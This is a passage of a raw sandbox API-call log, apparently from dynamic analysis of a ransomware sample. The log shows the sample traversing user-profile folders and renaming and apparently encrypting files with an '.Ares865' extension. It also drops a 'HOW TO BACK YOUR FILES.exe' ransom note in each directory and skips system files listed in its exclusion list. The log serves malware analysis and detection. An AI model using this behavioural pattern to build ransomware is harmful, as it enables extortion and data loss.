(lpString="xmlff") returned 5 [0065.001] lstrcmpiW (lpString1="l.pat", lpString2="xmlff") returned -1 [0065.001] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat.Ares865") returned 94 [0065.001] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\backup\\new\\windowsmail.pat"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\backup\\new\\windowsmail.pat.ares865"), dwFlags=0x1) returned 1 [0065.002] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\backup\\new\\windowsmail.pat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.002] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16384) returned 1 [0065.002] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.003] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.003] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.003] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0065.004] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.004] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0065.004] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4300, lpName=0x0) returned 0x154 [0065.005] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4300) returned 0x190000 [0065.011] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0065.012] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.012] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0065.012] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0065.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0065.012] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.012] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.012] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.012] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0065.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0065.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.012] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.013] CloseHandle (hObject=0x154) returned 1 [0065.013] CloseHandle (hObject=0x164) returned 1 [0065.013] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.013] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.013] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.017] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64e9680, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64e9680, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2fec56f, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 0 [0065.017] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.017] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2268 [0065.017] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player" [0065.017] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1808 | out: hHeap=0x2b0000) returned 1 [0065.017] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0065.017] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player") returned 59 [0065.017] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player" [0065.017] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.017] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.018] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.018] GetLastError () returned 0x0 [0065.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.018] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.018] CloseHandle (hObject=0x12c) returned 1 [0065.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.018] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.018] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.019] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.019] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.019] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.019] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.019] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.019] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.019] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.019] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.019] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4a90cce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x105300, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CurrentDatabase_372.wmdb.Ares865", cAlternateFileName="CURREN~1.ARE")) returned 1 [0065.019] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.019] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb.Ares865", lpString2="aoldtz.exe") returned 1 [0065.019] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb.Ares865", lpString2=".") returned 1 [0065.019] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb.Ares865", lpString2="..") returned 1 [0065.019] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb.Ares865", lpString2="windows") returned -1 [0065.019] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb.Ares865", lpString2="bootmgr") returned 1 [0065.019] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb.Ares865", lpString2="temp") returned -1 [0065.019] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb.Ares865", lpString2="pagefile.sys") returned -1 [0065.019] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb.Ares865", lpString2="boot") returned 1 [0065.019] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb.Ares865", lpString2="ids.txt") returned -1 [0065.019] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb.Ares865", lpString2="ntuser.dat") returned -1 [0065.019] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb.Ares865", lpString2="perflogs") returned -1 [0065.019] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb.Ares865", lpString2="MSBuild") returned -1 [0065.019] lstrlenW (lpString="CurrentDatabase_372.wmdb.Ares865") returned 32 [0065.019] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\*") returned 61 [0065.019] lstrcpyW (in: lpString1=0x2cce478, lpString2="CurrentDatabase_372.wmdb.Ares865" | out: lpString1="CurrentDatabase_372.wmdb.Ares865") returned="CurrentDatabase_372.wmdb.Ares865" [0065.019] lstrlenW (lpString="CurrentDatabase_372.wmdb.Ares865") returned 32 [0065.019] lstrlenW (lpString="Ares865") returned 7 [0065.020] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0065.020] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a90cce0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a90cce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.020] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.020] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x11370, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalMLS_3.wmdb.Ares865", cAlternateFileName="LOCALM~1.ARE")) returned 1 [0065.020] lstrcmpiW (lpString1="LocalMLS_3.wmdb.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.020] lstrcmpiW (lpString1="LocalMLS_3.wmdb.Ares865", lpString2="aoldtz.exe") returned 1 [0065.020] lstrcmpiW (lpString1="LocalMLS_3.wmdb.Ares865", lpString2=".") returned 1 [0065.020] lstrcmpiW (lpString1="LocalMLS_3.wmdb.Ares865", lpString2="..") returned 1 [0065.020] lstrcmpiW (lpString1="LocalMLS_3.wmdb.Ares865", lpString2="windows") returned -1 [0065.020] lstrcmpiW (lpString1="LocalMLS_3.wmdb.Ares865", lpString2="bootmgr") returned 1 [0065.020] lstrcmpiW (lpString1="LocalMLS_3.wmdb.Ares865", lpString2="temp") returned -1 [0065.020] lstrcmpiW (lpString1="LocalMLS_3.wmdb.Ares865", lpString2="pagefile.sys") returned -1 [0065.020] lstrcmpiW (lpString1="LocalMLS_3.wmdb.Ares865", lpString2="boot") returned 1 [0065.020] lstrcmpiW (lpString1="LocalMLS_3.wmdb.Ares865", lpString2="ids.txt") returned 1 [0065.020] lstrcmpiW (lpString1="LocalMLS_3.wmdb.Ares865", lpString2="ntuser.dat") returned -1 [0065.020] lstrcmpiW (lpString1="LocalMLS_3.wmdb.Ares865", lpString2="perflogs") returned -1 [0065.020] lstrcmpiW (lpString1="LocalMLS_3.wmdb.Ares865", lpString2="MSBuild") returned -1 [0065.020] lstrlenW (lpString="LocalMLS_3.wmdb.Ares865") returned 23 [0065.020] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb.Ares865") returned 92 [0065.020] lstrcpyW (in: lpString1=0x2cce478, lpString2="LocalMLS_3.wmdb.Ares865" | out: lpString1="LocalMLS_3.wmdb.Ares865") returned="LocalMLS_3.wmdb.Ares865" [0065.020] lstrlenW (lpString="LocalMLS_3.wmdb.Ares865") returned 23 [0065.020] lstrlenW (lpString="Ares865") returned 7 [0065.020] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0065.020] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sync Playlists", cAlternateFileName="SYNCPL~1")) returned 1 [0065.020] lstrcmpiW (lpString1="Sync Playlists", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.020] lstrcmpiW (lpString1="Sync Playlists", lpString2="aoldtz.exe") returned 1 [0065.020] lstrcmpiW (lpString1="Sync Playlists", lpString2=".") returned 1 [0065.020] lstrcmpiW (lpString1="Sync Playlists", lpString2="..") returned 1 [0065.020] lstrcmpiW (lpString1="Sync Playlists", lpString2="windows") returned -1 [0065.020] lstrcmpiW (lpString1="Sync Playlists", lpString2="bootmgr") returned 1 [0065.020] lstrcmpiW (lpString1="Sync Playlists", lpString2="temp") returned -1 [0065.020] lstrcmpiW (lpString1="Sync Playlists", lpString2="pagefile.sys") returned 1 [0065.020] lstrcmpiW (lpString1="Sync Playlists", lpString2="boot") returned 1 [0065.020] lstrcmpiW (lpString1="Sync Playlists", lpString2="ids.txt") returned 1 [0065.020] lstrcmpiW (lpString1="Sync Playlists", lpString2="ntuser.dat") returned 1 [0065.020] lstrcmpiW (lpString1="Sync Playlists", lpString2="perflogs") returned 1 [0065.021] lstrcmpiW (lpString1="Sync Playlists", lpString2="MSBuild") returned 1 [0065.021] lstrlenW (lpString="Sync Playlists") returned 14 [0065.021] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\LocalMLS_3.wmdb.Ares865") returned 83 [0065.021] lstrcpyW (in: lpString1=0x2cce478, lpString2="Sync Playlists" | out: lpString1="Sync Playlists") returned="Sync Playlists" [0065.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2260 [0065.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x96) returned 0x334fc8 [0065.021] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2268 | out: ListHead=0x2e7710, ListEntry=0x2d2268) returned 0x2d2248 [0065.021] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sync Playlists", cAlternateFileName="SYNCPL~1")) returned 0 [0065.021] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.021] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2268 [0065.021] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists" [0065.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0065.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0065.021] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists") returned 74 [0065.021] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists" [0065.021] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.021] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.022] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.022] GetLastError () returned 0x0 [0065.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.022] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.022] CloseHandle (hObject=0x12c) returned 1 [0065.022] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.022] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.022] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.022] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.022] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.022] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.022] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.022] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.022] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.022] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.022] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.022] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0065.022] lstrcmpiW (lpString1="en-US", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.022] lstrcmpiW (lpString1="en-US", lpString2="aoldtz.exe") returned 1 [0065.023] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0065.023] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0065.023] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0065.023] lstrcmpiW (lpString1="en-US", lpString2="bootmgr") returned 1 [0065.023] lstrcmpiW (lpString1="en-US", lpString2="temp") returned -1 [0065.023] lstrcmpiW (lpString1="en-US", lpString2="pagefile.sys") returned -1 [0065.023] lstrcmpiW (lpString1="en-US", lpString2="boot") returned 1 [0065.023] lstrcmpiW (lpString1="en-US", lpString2="ids.txt") returned -1 [0065.023] lstrcmpiW (lpString1="en-US", lpString2="ntuser.dat") returned -1 [0065.023] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0065.023] lstrcmpiW (lpString1="en-US", lpString2="MSBuild") returned -1 [0065.023] lstrlenW (lpString="en-US") returned 5 [0065.023] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\*") returned 76 [0065.023] lstrcpyW (in: lpString1=0x2cce496, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0065.023] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2260 [0065.023] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa2) returned 0x2e2710 [0065.023] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2268 | out: ListHead=0x2e7710, ListEntry=0x2d2268) returned 0x2d2248 [0065.023] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4aad5d60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.023] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.023] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4aad5d60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0065.023] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.023] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2268 [0065.023] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0065.023] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0065.023] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0065.023] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned 80 [0065.023] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync 